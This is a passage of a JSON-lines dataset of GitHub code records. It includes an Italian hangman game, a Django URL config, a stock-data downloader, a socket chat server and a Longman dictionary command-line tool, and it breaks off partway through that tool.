Buona fortuna\")\ntime.sleep(3)\n\n# \"terza versione\" => complichiamo molto il gioco con una lunga lista di parole da cui pescare\n# lettura file -> ogni riga un elemento di una lista\nwith open(\"parole.txt\") as file_parole:\n parole = file_parole.readlines()\n\n# la \"seconda versione\" usava questa lista di parole...\n# parole = [\"studente\", \"lezione\", \"sport\", \"computer\", \"daino\", \"baseball\"]\n# la \"prima versione\" usava una parola fissa\n# parola = \"studente\"\n# scelta di una parola a caso\nparola = random.choice(parole)\n# alla quale va rimosso il carattere di \"newline\"\nparola = parola.replace(\"\\n\", \"\")\nparola_originale = parola\nlunghezza = len(parola)\ngia_provato = []\nmostra = \"-\" * lunghezza\n\n\ntentativi = 5\nindovinato = False\n\nwhile tentativi > 0 and not indovinato:\n\n # introduzione testuale ad ogni tentativo\n print(\"Tentativi rimasti:\", tentativi)\n time.sleep(2)\n print(\"La parola da indovinare è:\", mostra)\n\n # chiedo una lettera\n while True:\n prova = input(\"Prova con una nuova lettera: \\n\")\n time.sleep(1)\n\n if prova not in gia_provato:\n gia_provato.append(prova)\n break\n else: # questo \"else\" poteva essere evitato ;)\n print(\"La lettera\", prova, \"è già stata tentata\")\n time.sleep(1)\n\n # lettera buona!\n if prova in parola:\n print(\"lettera azzeccata\")\n while parola.find(prova) != -1:\n indice = parola.find(prova)\n parola = parola[:indice] + \"#\" + parola[indice+1:]\n mostra = mostra[:indice] + prova + mostra[indice+1:]\n time.sleep(1)\n\n if \"-\" not in mostra:\n print(\"\")\n print(\"Woooah! Sei riuscito ad indovinare la parola!\")\n print(\"la parola era:\", mostra)\n indovinato = True\n\n # lettera errata!\n else:\n print(\"La lettera\", prova, \"non è parte della parola misteriosa\")\n tentativi = tentativi - 1\n\n if tentativi == 4:\n print(\" _____ \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \"__|__\\n\")\n\n if tentativi == 3:\n print(\" _____ \\n\"\n \" | |\\n\"\n \" | |\\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \"__|__\\n\")\n\n if tentativi == 2:\n print(\" _____ \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | \\n\"\n \" | \\n\"\n \" | \\n\"\n \"__|__\\n\")\n\n if tentativi == 1:\n print(\" _____ \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | O \\n\"\n \" | \\n\"\n \" | \\n\"\n \"__|__\\n\")\n\n if tentativi == 0:\n print(\" _____ \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | | \\n\"\n \" | O \\n\"\n \" | /|\\ \\n\"\n \" | / \\ \\n\"\n \"__|__\\n\")\n print(\"La parola da indovinare era:\", parola_originale)\n\n\nprint(\"\")\nprint(\"Gioco finito\")\nif indovinato:\n print(\"Sei stato bravo, ma vincerai la prossima volta?\")\nelse:\n print(\"Peccato non sei riuscito ad indovinare la parola\")\n","repo_name":"ctrlmau/laboratorio-python-2023","sub_path":"01-impiccato/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"it","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1879804287","text":"\"\"\"donanciones URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom juguetes import views\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n\n\turl(r'^$', views.index),\n\turl(r'^donacion/$', views.cliente),\n\turl(r'^log_in/$', views.log_in),\n\turl(r'^log_out/$', views.log_out),\n\n\turl(r'^estado/(\\d{1,10})/$', views.estado),\n\turl(r'^estado/(\\d{1,10})/eliminar$', views.estado_eliminar),\n\turl(r'^estado/listado/$', views.estados),\n\turl(r'^estado/nuevo$', views.estado_nuevo),\n\t\n\turl(r'^donacion/(\\d{1,10})/$', views.donacion),\n\turl(r'^donacion/(\\d{1,10})/eliminar$', views.donacion_eliminar),\n\turl(r'^donacion/listado$', views.donaciones),\n\turl(r'^donacion/nuevo$', views.donacion_nuevo),\n\t\n\turl(r'^donante/(\\d{1,10})/$', views.donante),\n\turl(r'^donante/(\\d{1,10})/eliminar$', views.donante_eliminar),\n\turl(r'^donante/listado$', views.donantes),\n\turl(r'^donante/nuevo$', views.donante_nuevo),\n\n\turl(r'^juguete/(\\d{1,10})/$', views.juguete),\n\turl(r'^juguete/(\\d{1,10})/eliminar$', views.juguete_eliminar),\n\turl(r'^juguete/listado$', views.juguetes),\n\turl(r'^juguete/nuevo$', views.juguete_nuevo),\n\n\turl(\"\", include('social.apps.django_app.urls', namespace='social')),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"leorb23/donanciones","sub_path":"donanciones/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70886057287","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ndirect Python Toolbox\nAll-in-one toolbox to encapsulate Python runtime variants\n----------------------------------------------------------------------------\n(C) direct Netware Group - All rights reserved\nhttps://www.direct-netware.de/redirect?dpt;builder_suite\n\nThis Source Code Form is subject to the terms of the Mozilla Public License,\nv. 2.0. If a copy of the MPL was not distributed with this file, You can\nobtain one at http://mozilla.org/MPL/2.0/.\n----------------------------------------------------------------------------\nhttps://www.direct-netware.de/redirect?licenses;mpl2\n----------------------------------------------------------------------------\n#echo(dptBuilderSuiteVersion)#\n#echo(__FILEPATH__)#\n\"\"\"\n\nfrom os import path\n\nfrom ..copy_builder import CopyBuilder\n\nclass InstallCopiedAndExtendedData(object):\n \"\"\"\nThis class provides the callback to copy and extend source files with the\nrequested extensions.\n\n:author: direct Netware Group\n:copyright: direct Netware Group - All rights reserved\n:package: dpt\n:subpackage: builder_suite\n:since: v1.0.0\n:license: https://www.direct-netware.de/redirect?licenses;mpl2\n Mozilla Public License, v. 
2.0\n \"\"\"\n\n __slots__ = ( )\n \"\"\"\npython.org: __slots__ reserves space for the declared variables and prevents\nthe automatic creation of __dict__ and __weakref__ for each instance.\n \"\"\"\n\n @staticmethod\n def callback(source_dir_path, target_path, target_parameters):\n \"\"\"\nCallback to be used in \"dNG.distutils.InstallData\".\n\n:param source_dir_path: Source directory to copy files in\n:param target_path: Target directory for build\n:param target_parameters: Target parameters\n\n:since: v1.0.0\n \"\"\"\n\n target_extensions = target_parameters.get(\"copy_builder_extensions\")\n\n if (type(target_extensions) is list and len(target_extensions) > 0):\n copy_builder = CopyBuilder(target_parameters,\n source_dir_path,\n target_path,\n target_extensions,\n default_chmod_files = \"0644\",\n default_chmod_dirs = \"0755\"\n )\n\n if (target_parameters.get(\"copy_builder_strip_source_dir_path\", False)):\n copy_builder.set_strip_prefix(source_dir_path + path.sep)\n #\n\n copy_builder.make_all()\n #\n #\n#\n","repo_name":"dNG-git/dpt_builder_suite","sub_path":"src/dpt_builder_suite/distutils/install_copied_and_extended_data.py","file_name":"install_copied_and_extended_data.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"17345047374","text":"from yahoo_finance import Share\nimport pandas as pd\nimport csv\nimport os.path\n\ndef EditCsv(stock):\n\tdata = Share(stock)\n\tx = data.get_historical('2000-01-01','2016-04-01')\n\tdf = pd.DataFrame(x)\n\tcols = ['Date','Open','High','Low','Close','Volume','Adj_Close']\n\tdf = df.ix[:,cols]\n\tdf = df.set_index('Date')\n\tdf.to_csv(\"Stock/\"+stock+\".csv\")\ndef get_list(stock_list_file):\n\tstock_list = []\n\twith open(stock_list_file, 'rb') as csvfile:\n\t\tspamreader = csv.reader(csvfile, delimiter=',')\n\t\tfor row in spamreader:\n\t\t\tstock_list.append(row)\n\treturn stock_list[0]\n\nif __name__ == \"__main__\":\n\tstock_list = get_list('0.Stock_Ticker.csv')\n\tfor stock in stock_list:\n\t\tif not os.path.isfile(\"Stock/\"+stock+\".csv\"):\n\t\t\ttry:\n\t\t\t\tEditCsv(stock)\n\t\t\t\tprint (\"Finished\",stock)\n\t\t\texcept:\n\t\t\t\tprint (stock+\"cannot download\")\n","repo_name":"nancywu5/HKU-FinCloud","sub_path":"Collect Data: Preprocessing Data/US_Nasdaq/Get_Data.py","file_name":"Get_Data.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14408850603","text":"'''\n根据左右相等找,有点复杂\n'''\n\n\ndef get_mid(num):\n n = len(num)\n if n % 2 == 1:\n return num[int(n / 2)]\n else:\n end = int(n / 2)\n start = end - 1\n return sum(num[end], num[start]) / 2\n\n\ndef demo4(a, b):\n m, n = len(a), len(b)\n num = m + n\n if num % 2 == 0:\n p1 = int(num / 2) - 1\n p2 = p1 + 1\n left_num = p2\n\n else:\n p = int(num / 2)\n left_num = p\n\n b_start = 0\n a_x = 0\n a_y = m - 1\n\n b_x = 0 # 最左边下标\n b_y = n - 1 # 最右边下标\n drop_num = 0\n while left_num - drop_num > 0:\n a_y = len(a)\n b_y = len(b)\n a_mid = int((0 + a_y) / 2)\n b_mid = int((0 + b_y) / 2)\n\n if a[a_mid] >= b[b_mid]:\n drop_num += b_mid # 统计数量2/\n b = b[b_mid:]\n elif a[a_mid] < b[b_mid]:\n if a_mid == 0:\n del a[a_mid]\n drop_num += 1\n else:\n a = a[a_mid:]\n drop_num += a_mid # 5\n\n if len(a) == 0:\n p = left_num - drop_num\n return b[p]\n elif len(b) == 0:\n p = left_num - drop_num\n return a[p]\n\n return min(a[0], b[0])\n\n\n''' 寻找第k个小的数,转化为查找问题'''\ndef demo_version2(nums1, 
nums2):\n pass\n\n\nif __name__ == '__main__':\n a = [2, 4, 6, 9, 12, 17]\n b = [5, 7, 8, 10, 14]\n\n a = [1, 2, 5, 6]\n b = [3, 8, 9]\n res = demo4(a, b)\n print(res)\n","repo_name":"DaiJitao/algorithm","sub_path":"leetcode_china/demo4_4.py","file_name":"demo4_4.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12742946953","text":"import socket, threading\n\nPORT = 5050\nSERVER = socket.gethostbyname(socket.gethostname())\nADDR = (SERVER, PORT)\nFORMAT = 'utf-8'\nDISCONNECT_MESSAGE = \"DISCONNECT\"\nserver = socket.socket()\nserver.bind(ADDR)\nserver.listen()\n\nclients = []\nnicknames = []\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\ndef handle(client):\n while True:\n message = client.recv(1024)\n msg = message.decode(FORMAT)\n\n if msg != DISCONNECT_MESSAGE:\n broadcast(message)\n\n elif msg == DISCONNECT_MESSAGE:\n broadcast(f'{nickname} left the chat'.encode(FORMAT))\n index = clients.index(client)\n clients.remove(client)\n client.close()\n nickname = nicknames[index]\n nicknames.remove(nickname)\n break\n\n\ndef start():\n while True:\n client, address = server.accept()\n\n print(f\"Connected with {format(str(address))}\")\n client.send('NICKNAME'.encode(FORMAT))\n\n nickname = client.recv(1024).decode(FORMAT)\n nicknames.append(nickname)\n clients.append(client)\n\n print(f\"Nickname is {format(nickname)}\")\n \n broadcast(f\"{format(nickname)} joined\".encode(FORMAT))\n client.send('Connected to server!'.encode(FORMAT))\n\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\nstart()\n","repo_name":"Eudita/PP-mini-project-sem-II","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40227610573","text":"import nltk\nfrom pattern3.en import conjugate\nfrom pattern3.en import pluralize, singularize, lemma\nfrom pattern3.en import suggest\n\n\n# sent에서 position 위치에 있는 단어를 result로 대체해라.\nsent = \"He had given up the game.\"\nposition = 2\nresult = \"send\"\n\ntokens = nltk.word_tokenize(sent)\n# print(tokens)\ntagged = nltk.pos_tag(tokens)\nprint(tagged)\n\ntag = tagged[position][1]\nprint('POS tag : ' + tag)\n\n\nprint(suggest(tokens[position]))\nprint('Lemma : ' + lemma(tokens[position]))\n\n# 동사\nverb_set = {'VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ'}\ndic = dict()\ndic['VB'] = ['infinitive', None, None, None, None]\ndic['VBD'] = ['past', None, None, 'indicative', None]\ndic['VBG'] = ['present', None, None, 'indicative', 'progressive']\ndic['VBN'] = ['past', None, None, 'indicative', 'progressive']\ndic['VBP'] = ['present', 1, 'singular', 'indicative', 'imperfective']\ndic['VBZ'] = ['present', 3, 'singular', 'indicative', 'imperfective']\n\nif tag in verb_set:\n conjugated = conjugate(result,\n tense=dic[tag][0],\n person=dic[tag][1],\n number=dic[tag][2],\n mood=dic[tag][3],\n aspect=dic[tag][4],\n negated=False)\n result = conjugated if conjugated is not None else result\n\n# 명사\nnoun_set = {'NN', 'NNS', 'NNP', 'NNPS'}\n\nif tag in noun_set:\n if tag == 'NNS' or tag == 'NNPS':\n result = pluralize(result)\n else:\n result = singularize(result)\n\nprint('Result : ' + 
result)\n","repo_name":"jooh95/Phrase-Recognizing-System","sub_path":"grammar/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"14337315432","text":"'''\n@Author:Sailesh Chauhan\n@Date:2021-06-01\n@Last Modified by:Sailesh Chauhan\n@Last Modified time:2021-06-01\n@Title:To Welcome User\n'''\n\nimport sys\ntry:\n userName=str(input(\"Enter your Full Name\\n\"))\n userName=userName.replace(\" \",\"\")\n if(len(userName)>3):\n print(\"Hello \"+userName+\" ,How are you ?\")\n quit()\n print(\"User Name must be more than 3 characters\") \nexcept Exception as ex:\n print(ex)","repo_name":"saileshchauhan/PythonProgram","sub_path":"BasicCorePrograms/1_WelcomeUser.py","file_name":"1_WelcomeUser.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22396862185","text":"#!/usr/bin/env python3\n\nimport sys\nimport re\nimport json\nimport os\nimport sqlite3\nimport socket\n\nfrom itertools import count\nfrom functools import cmp_to_key\nfrom argparse import ArgumentParser\nfrom configparser import ConfigParser\nfrom pathlib import Path\nfrom contextlib import closing\nfrom urllib.error import URLError\nfrom urllib.request import urlopen\nfrom urllib.parse import quote\n\nfrom lxml import etree\n\n_VERSION = '2.0.4'\n\nMAIN_URL = 'https://www.ldoceonline.com/dictionary/{0}'\n\n\nclass OptionAndConfig:\n \"\"\"Save options from command line\n and the configs from config file if specify\n \"\"\"\n quiet = False\n dbpath = '$HOME/.cache/ldcv/ldcv-cache.db3'\n threads_max = 20\n timeout = 7\n\n _HOME = os.getenv('HOME')\n _THREAD_MAX = 100\n _TIMEOUT = 10*60 # 10 minutes\n\n def __init__(self):\n self.dbpath = self.dbpath.replace('$HOME', self._HOME)\n\n\noptions = OptionAndConfig()\n\ndef strip(s):\n \"\"\"Remove redundant space characters\n \"\"\"\n return re.sub(r\"[\\s]+\", ' ', s).strip() if isinstance(s, str) else ''\n\n\ndef parse_word_fams(wordfams):\n if wordfams is None:\n return []\n return list(set(word for word in wordfams.xpath(\".//@title\")))\n\n\ndef parse_sense(sense, freq=1):\n def _(exp):\n EMPTY_ELEMENT = etree.Element('_')\n eles = sense.find(exp)\n return eles if eles is not None else EMPTY_ELEMENT\n\n def parse_examples():\n def mp3(ent):\n src = ent.find('.//span[@data-src-mp3]')\n return src.attrib['data-src-mp3'] if src is not None else ''\n return list({\n 'coll': ['', ''],\n 'example': [strip(''.join(example.itertext())), mp3(example)],\n } for example in sense.iterfind('.//span[@class=\"EXAMPLE\"]'))\n\n ret = {\n # the smaller the more frequent, ordered by original page\n 'freq': freq,\n # the opposite\n 'opp': strip(''.join(x for x in _('.//span[@class=\"OPP\"]').itertext()\n if x not in ('OPP', 'SYN'))),\n # the synonym\n 'syn': strip(''.join(x for x in _('.//span[@class=\"SYN\"]').itertext()\n if x not in ('OPP', 'SYN'))),\n # a short explanation\n 'signpost': strip(_('.//span[@class=\"SIGNPOST\"]').text),\n # countable or uncountable\n 'attr': ''.join(filter(lambda x: x.strip() not in ('[', ']'),\n _('.//span[@class=\"GRAM\"]').itertext())),\n # the exact explanation\n 'def': ''.join(_('.//span[@class=\"DEF\"]').itertext()).strip(),\n # example sentences\n 'examples': parse_examples(),\n # phrases maybe?\n 'refs': list(x.strip() for x in re.split(r'[^ ()=/\\'’\\w-]+',\n ''.join(_('.//span[@class=\"Crossref\"]').itertext())) \\\n if 
x.strip() != ''),\n }\n return ret\n\n\ndef parse_entry(entry):\n def _(exp):\n EMPTY_ELEMENT = etree.Element('_')\n ret = entry.find(exp)\n return ret if ret is not None else EMPTY_ELEMENT\n\n def mp3(exp):\n src = entry.xpath(exp)\n return src[0].attrib['data-src-mp3'] if src else ''\n\n ret = {\n 'pron': ''.join(_('.//span[@class=\"PronCodes\"]').itertext()).strip(),\n 'attr': strip(_('.//span[@class=\"POS\"]').text),\n 'audio-br': mp3('.//span[contains(@class, \"brefile\")]'),\n 'audio-us': mp3('.//span[contains(@class, \"amefile\")]'),\n 'senses': [parse_sense(sense, i) for i, sense in enumerate(entry.iterfind('.//span[@class=\"Sense\"]'), 1)]\n }\n return ret\n\n\ndef page_didyoumean(html, word):\n didyoumean = html.find('.//ul[@class=\"didyoumean\"]')\n if didyoumean is None:\n return None\n return {\n 'word': word,\n 'suggestions': [x.text.strip() for x in didyoumean.iterfind('.//li/a')],\n }\n\n\ndef parse_word(html):\n \"\"\"@html: etree.Element\n \"\"\"\n word = {\n 'word': html.find('.//h1[@class=\"pagetitle\"]').text,\n 'fams': parse_word_fams(html.find('.//div[@class=\"wordfams\"]')),\n 'entries': [parse_entry(entry) for entry in html.xpath('//span[@class=\"dictentry\"]')],\n }\n\n return word\n\n\nclass Colorizing:\n colors = {\n 'none': \"\",\n 'default': \"\\033[0m\",\n 'bold': \"\\033[1m\",\n 'underline': \"\\033[4m\",\n 'blink': \"\\033[5m\",\n 'reverse': \"\\033[7m\",\n 'concealed': \"\\033[8m\",\n\n 'black': \"\\033[30m\",\n 'red': \"\\033[31m\",\n 'green': \"\\033[32m\",\n 'yellow': \"\\033[33m\",\n 'blue': \"\\033[34m\",\n 'magenta': \"\\033[35m\",\n 'cyan': \"\\033[36m\",\n 'white': \"\\033[37m\",\n\n 'on_black': \"\\033[40m\",\n 'on_red': \"\\033[41m\",\n 'on_green': \"\\033[42m\",\n 'on_yellow': \"\\033[43m\",\n 'on_blue': \"\\033[44m\",\n 'on_magenta': \"\\033[45m\",\n 'on_cyan': \"\\033[46m\",\n 'on_white': \"\\033[47m\",\n\n # ~color: the background color is `color'\n # and text color is reversal `color'\n '~black': \"\\033[40m\\033[37m\",\n '~red': \"\\033[41m\\033[36m\",\n '~green': \"\\033[42m\\033[35m\",\n '~yellow': \"\\033[43m\\033[34m\",\n '~blue': \"\\033[44m\\033[33m\",\n '~magenta':\"\\033[45m\\033[32m\",\n '~cyan': \"\\033[46m\\033[31m\",\n '~white': \"\\033[47m\\033[30m\",\n\n 'beep': \"\\007\",\n }\n\n @classmethod\n def colorize(cls, s, color=None):\n if options.color == 'never':\n return s\n if options.color == 'auto' and not sys.stdout.isatty():\n return s\n if color is None:\n return s\n colors = ''.join(cls.colors[x] for x in color.split(',') if x in cls.colors)\n return \"{0}{1}{2}\".format(colors, s, cls.colors['default'])\n\n\nclass OrderedNumber:\n list_chars = {\n 'number': ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9',],\n 'superscript': ['⁰', '¹', '²', '³', '⁴', '⁵', '⁶', '⁷', '⁸', '⁹',],\n }\n\n def __init__(self, _type='number'):\n self.chars = self.list_chars[_type] if _type in self.list_chars else self.list_chars['number']\n\n def __getitem__(self, no):\n return ''.join([self.chars[int(x)] for x in str(no)])\n\nclass DbAdapter:\n def __init__(self, dbpath):\n # TODO support Windows\n # mkdir recursively the dbpath directory\n directory = os.path.dirname(dbpath)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n self._db = sqlite3.connect(dbpath)\n with closing(self._db.cursor()) as cur:\n cur.execute(\"\"\"create table if not exists `words`(\n `word` text not null unique,\n `explanation` blob not null,\n primary key(`word`))\"\"\")\n self._db.commit()\n\n def __getitem__(self, word):\n if not isinstance(word, 
str):\n return None\n\n with closing(self._db.cursor()) as cur:\n cur.execute(\"select `explanation` from `words` where `word` = ?\", (word,))\n exp = cur.fetchone()\n try:\n exp = json.loads(exp[0] if exp else None)\n except TypeError or json.decoder.JSONDecodeError:\n return None\n return exp\n\n def __setitem__(self, word, explanation):\n with closing(self._db.cursor()) as cur:\n cur.execute(\"insert into `words`(`word`,`explanation`) values(?, ?)\",\n (word, json.dumps(explanation, ensure_ascii=False)))\n self._db.commit()\n\n def get_all_cached_words(self):\n with closing(self._db.cursor()) as cur:\n cur.execute(\"select `word` from `words`\")\n words = cur.fetchall()\n return (word[0] for word in words)\n\n def close(self):\n self._db.close()\n\n\ndef arg_parse():\n parser = ArgumentParser(prog='ldcv', description=\"LongMan Console Version\")\n parser.add_argument('-f', '--full',\n action='store_true',\n default=False,\n help=\"print verbose explanations. \"\n \"Default to print first three explanations\")\n parser.add_argument('-j', '--json',\n action='store_true',\n default=False,\n help=\"dump the explanation with JSON style\")\n parser.add_argument('--cache',\n action='store',\n help=\"specify a word list file then cache words from it to <cachefile>\")\n parser.add_argument('--merge',\n action='store',\n help=\"specify other <cachefiles> so merge the word and explanation to this <cachefile>\")\n parser.add_argument('-c', '--config',\n action='store',\n help=\"specify a config file\")\n parser.add_argument('--color',\n choices=['always', 'auto', 'never'],\n default='auto',\n help=\"colorize the output. \"\n 'Default to \"auto\" or can be \"never\" or \"always\"')\n parser.add_argument('words',\n nargs='*',\n help=\"words or quoted phrases to lookup\")\n return parser.parse_args(namespace=options)\n\n\ndef format_out_explanation(exp):\n \"\"\"format explanation from dict and print it\n \"\"\"\n # use in the inner for cache words\n if options.quiet:\n return\n\n if options.json:\n print(json.dumps(exp, ensure_ascii=False,indent=2, separators=(',', ': ')))\n return\n\n _ = Colorizing.colorize\n SENSE_MAX = 7\n SENSE_MIN = 3\n EXAMPLE_MAX = 3\n\n print(_(exp['word'], 'bold'))\n fams = exp['fams']\n if fams:\n print(\"{0}: {1}\".format(_(\"Word Families\", 'yellow'), \", \".join(fams)))\n\n def sense_cmp(a, b):\n # the prior field is `signpost' then `freq'\n if a['signpost'] != '':\n if b['signpost'] != '':\n return (a['freq'] - b['freq'])\n else:\n return -1\n elif b['signpost'] != '':\n return 1\n else:\n return (a['freq'] - b['freq'])\n\n SUPER = OrderedNumber('superscript')\n for i, entry in enumerate(exp['entries'], 1):\n attr = ''\n if entry['attr'] != '':\n attr = \" {} \".format(_(entry['attr'], 'green'))\n pron = entry['pron'] if entry['pron'] != '//' else ''\n print(\"{0}{1}{2}{3}\".format(exp['word'], SUPER[i], attr, pron))\n for i, sense in enumerate(sorted(entry['senses'],\n key=cmp_to_key(sense_cmp)), 1):\n if options.full or (sense['def'] != '' and i < SENSE_MAX) \\\n or (sense['def'] == '' and i < SENSE_MIN):\n print(\" {}.\".format(i), end='')\n if sense['attr'] != '':\n print(\" [{}]\".format(_(sense['attr'], 'green')), end='')\n if sense['signpost'] != '':\n print(\" {} \".format(_(sense['signpost'].upper(), 'yellow')), end='')\n print(\" {}\".format(_(sense['def'], 'cyan')), end='')\n if sense['syn'] != '':\n print(' {}: {}'.format(_('SYN', 'yellow'), sense['syn']), end='')\n if sense['opp'] != '':\n print(' {}: {}'.format(_('OPP', 'yellow'), sense['opp']), 
end='')\n print('')\n for i, example in enumerate(sense['examples'], 1):\n if options.full or i < EXAMPLE_MAX:\n print(\" ➤ {1}\".format(i, example['example'][0]))\n else:\n break\n if sense['refs']:\n print(\" » {0}\".format(\", \".join(sense['refs'])))\n else:\n break\n print('')\n\n\ndef format_out_suggestion(sugg):\n # use in the inner for cache words\n if options.quiet:\n return\n _ = Colorizing.colorize\n print('{0} {1}'.format(_(sugg['word'], 'bold'), _('not found', 'red')))\n print('{0} {1}'.format(_('Did you mean:', 'green'), ', '.join(sugg['suggestions'])))\n\n\ndef page_no_results(html):\n h1 = html.find('.//h1[@class=\"search_title\"]')\n if h1 is None:\n return False\n title = ''.join(h1.itertext()).lower()\n return (\"sorry\" in title and \"no\" in title)\n\n\ndef format_out_sorry_page(word):\n # use in the inner for cache words\n if options.quiet:\n return\n _ = Colorizing.colorize\n print('{0} {1}'.format(_(\"Sorry, there are no results for\", 'red'), _(word, 'bold')))\n\n\ndef lookup_word(word):\n if os.path.exists(options.dbpath) \\\n and not os.path.isfile(options.dbpath):\n print(\"dbcache file has existed at {} \"\n \"and isn't a regular file.\".format(options.dbpath))\n return 1\n # prepare this word, maybe this is a feasible idea\n word = strip(word.lower()).replace(' ', '-')\n db = DbAdapter(options.dbpath)\n exp = db[word]\n if exp:\n format_out_explanation(exp)\n db.close()\n return 0\n\n try:\n data = urlopen(MAIN_URL.format(quote(word)), timeout=options.timeout)\n except socket.timeout:\n print(\"Network timed out in {}s\".format(options.timeout))\n db.close()\n return 1\n except OSError:\n print(\"Network is unavailable\")\n db.close()\n return 1\n ctx = data.read().decode(\"utf-8\")\n html = etree.HTML(ctx)\n\n suggestion = page_didyoumean(html, word)\n # the page `sorry' means that the word is random letters\n if page_no_results(html):\n format_out_sorry_page(word)\n # the page `didyoumean' means that the word you type doesn't exist\n elif suggestion is not None:\n format_out_suggestion(suggestion)\n else:\n exp = parse_word(html)\n # cache this word\n db[word] = exp\n format_out_explanation(exp)\n db.close()\n return 0\n\ndef interaction():\n \"\"\"interactional mode\n \"\"\"\n print('LongMan Console Version. 
type /help to get help.')\n try:\n import readline\n except ImportError:\n pass\n while True:\n try:\n word = input('> ').strip()\n if word.startswith('/'):\n if word in ('/full'):\n options.full = True\n print('verbose explanations on')\n elif word in ('/!full', '/~full'):\n options.full = False\n print('verbose explanations off')\n elif word in ('/v', '/version'):\n print('v{}'.format(_VERSION))\n elif word in ('/h', '/help'):\n print('/full turn on verbose explanation\\n'\n '/!full, /~full turn off verbose explanation\\n'\n '/h, /help show this page\\n'\n '/v, /version show version\\n'\n '/q, /quit exit programm')\n elif word in ('/q', '/quit'):\n break\n elif word != '':\n lookup_word(word)\n except KeyboardInterrupt:\n print()\n continue\n except EOFError:\n break\n print(\"Bye\")\n\n\ndef cache_words(wordsfile):\n from time import time\n from multiprocessing import Process\n\n threads_max = options.threads_max\n\n words = []\n with open(wordsfile) as cf:\n words = [strip(word) for line in cf for word in re.split('[,;|\\n]+', line) if strip(word) != '']\n\n print(\"caching {} words with {} threads.\".format(len(words), threads_max))\n options.quiet = True\n start = time()\n def thread_lookup_word(words):\n for w in words:\n lookup_word(w)\n portion_size = max(1, len(words) // threads_max)\n tasks = []\n for i in range(0, len(words), portion_size):\n ws = words[i:i+portion_size]\n if not ws:\n continue\n thread = Process(target=thread_lookup_word,\n name=\"quering words({}~{})\".format(i, i+portion_size), args=(ws,))\n thread.start()\n tasks.append(thread)\n for t in tasks:\n t.join()\n end = time()\n elapse = end-start\n print(\"cache {} word(s) and the total time \"\n \"is {:.2f}s, average time {:0.2f}/s with {} threads.\".format(\n len(words), elapse, len(words)/elapse, threads_max))\n\ndef merge_db(otherdb):\n count = 0\n todb = DbAdapter(options.dbpath)\n fromdb = DbAdapter(otherdb)\n print(f\"merge {otherdb} into dbcache locating at {options.dbpath} ...\")\n for word in fromdb.get_all_cached_words():\n if not todb[word]:\n print(f\"merge {word} into dbcache\")\n todb[word] = fromdb[word]\n count += 1\n fromdb.close()\n todb.close()\n print(f\"merge {otherdb} into dbcache over with amount of {count}\")\n\n\ndef parse_config(config):\n \"\"\"parse config file according to the order `/etc/ldcv/ldcvrc',\n `$HOME/.config/ldcv/ldcvrc', `./ldcvrc' and @config, and the later\n will overwrite the prevoius\n \"\"\"\n global options\n RCLIST = ('/etc/ldcv/ldcvrc', options._HOME+'/.config/ldcv/ldcvrc',\n './ldcvrc', config or '')\n cfg = ConfigParser()\n for rc in RCLIST:\n if not os.path.isfile(rc):\n continue\n cfg.read(rc)\n # parse `main' section\n if 'main' in cfg and 'full' in cfg['main']:\n options.full = cfg['main'].getboolean('full')\n # parse `cache` section\n if 'cache' in cfg:\n cache = cfg['cache']\n if 'dbpath' in cache:\n path = cache['dbpath'].replace('$HOME', options._HOME)\n cwd = os.getcwd()\n # absolute path, evaluate directly\n if os.path.isabs(path):\n options.dbpath = path\n # relative path, add prefix the current word directory\n else:\n options.dbpath = os.path.join(cwd, path)\n if 'threads-max' in cache:\n # 2 ~ options._THREAD_MAX\n tmax = max(2, int(cache['threads-max']))\n options.threads_max = min(tmax, options._THREAD_MAX)\n # parse `net` section\n if 'net' in cfg:\n net = cfg['net']\n if 'timeout' in net:\n tout = max(3, int(net['timeout']))\n options.timeout = min(tout, options._TIMEOUT)\n\n\ndef main():\n global options\n options = 